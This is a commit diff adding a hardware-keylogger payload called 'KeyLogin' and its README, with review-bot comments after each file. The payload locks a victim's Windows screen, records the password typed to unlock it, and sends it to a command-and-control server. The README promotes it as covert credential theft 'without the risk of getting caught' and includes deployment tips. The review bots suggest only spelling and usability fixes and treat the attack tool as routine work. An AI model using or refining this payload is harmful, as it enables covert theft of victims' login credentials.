commit
2da4c3f537
Binary file added (not shown): 14 KiB
Binary file added (not shown): 24 KiB
@ -0,0 +1,39 @@
###############################KeyLogin#####################################
# Version 1.1
# OS: Windows
# Author: 0iphor13
# Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password.
# Afterwards these will be exfiltrated to your CloudC2 instance. The most covert technique to get clear text credentials!
#
####################Defining Language,Trigger & Clean Up#####################
MATCH \[ENTER\]
Q DELAY 2000
export DUCKY_LANG=de
Q DELAY 2000
rm /root/loot/win-pass*
########################Locking User Machine################################
Q LOCK
Q DELAY 500
Q GUI l
C2NOTIFY INFO 'Locked Users Machine!'
Q DELAY 250
Q DELETE
Q DELAY 250
Q UNLOCK
WAIT_FOR_KEYBOARD_ACTIVITY 1
#######Define until which point you want to intercept the keystrokes########
SAVEKEYS /root/loot/win-pass.txt NEXT 4
Q DELAY 2000
while [ ! -f /root/loot/win-pass.txt ]; do sleep 2; done
#####################Exfiltrating Credentials###############################
C2EXFIL /root/loot/win-pass.txt
Q DELAY 1000
C2NOTIFY INFO 'User Credentials Received!'
#You may want to delete or disable to payload after execution to avoid endless logout processes
#rm /root/udisk/payloads/KeyLogin.txt
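Review bot: `SAVEKEYS /root/loot/win-pass.txt NEXT 4` hardcodes a four-keystroke capture, while the comment directly above it says the cut-off point is something the user defines; the comment should say that the `4` is the value to edit, and the same applies to the hardcoded `export DUCKY_LANG=de`. The trailing comment about "endless logout processes" describes behaviour that is already visible in this hunk: `MATCH \[ENTER\]` re-arms on every Enter, so the lock-and-capture sequence repeats until the payload file is removed; the README should state that up front rather than leaving it to a commented-out `rm`. `C2NOTIFY INFO 'User Credentials Received!'` is sent after a fixed `Q DELAY 1000` regardless of whether `C2EXFIL` actually delivered the file, so the notification text overstates what is known at that point. Spelling: "Discription" should be "Description", "Afterwards these" has no clear antecedent (the credentials), and "disable to payload" should read "disable the payload".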
@ -0,0 +1,35 @@
**Title: KeyLogin**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.1<br>
Requirements: CloudC2 Instance</p>
**What is KeyLogin?**
#
*When using a KeyCroc, what is your goal? Likely credentials or remote access.*
*But many environments, especially within the banking sector are locked down.*
*Taking advantage of available resources not only facilitates the use of payloads, it also enables long, undetected actions during an engagement.*
*KeyLogin makes use of the Windows shortcut [Windows]+L to lock the system. Thanks to the KeyCrocs ability to sniff keystrokes, the password or pin can then be exfiltrated.*
*This payload automates login stealing. It waites for the victim to press enter (to avoid logging wrong credentials), then locks the targets screen and sends the received credentials to your C2 instance.*
*As there are different sorts of authentication types for windows systems, you can/need to configure until which point you want to intercept theses keystrokes. Until ENTER is pressed? Until a certain lenght was typed? It's up to you!*
#
There you go, login credentials, exfiltrated in an automated manner, without the risk of getting caught.
**Instruction:**
- Connect KeyCroc to C2
- Configure payload language and DELAYs
- Plugin KeyCroc & run away (pro tip: In the morning or after lunch your chances to get a good result are much higher)
- You might want to disable to payload after the first success to avoid locking out the user!
KeyCroc will Notify you of the current attack state
![alt text](https://github.com/0iphor13/keycroc-payloads/blob/master/payloads/library/credentials/KeyLogin/notifications.png)
KeyCroc will save the inserted credentials into a seperate file for you
![alt text](https://github.com/0iphor13/keycroc-payloads/blob/master/payloads/library/credentials/KeyLogin/loot.png)


Credit for support:
- Korben
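Review bot: Both image links point at absolute `github.com/.../blob/master/...` URLs instead of the `notifications.png` and `loot.png` files this same commit adds, so they break on forks, other branches and mirrors, and `blob` URLs serve an HTML page rather than the image; relative paths to the two added files would render everywhere. The bare `#` lines render as empty headings in Markdown; a blank line or `---` is the usual separator. The "Instruction" list and the payload header disagree on what the user must configure: the list says language and DELAYs, but the payload also hardcodes the keystroke count in `SAVEKEYS ... NEXT 4`, which the "until which point" paragraph presents as the main choice. The "without the risk of getting caught" line is not supported by the payload, whose own trailing comment admits it re-locks the screen on every Enter until removed; the README should carry that caveat instead of the claim. Spelling and grammar: "waites" -> "waits", "lenght" -> "length", "theses" -> "these", "seperate" -> "separate", "KeyCrocs" -> "KeyCroc's", "targets" -> "target's", "disable to payload" -> "disable the payload", "Plugin" -> "Plug in", "Instruction:" -> "Instructions:".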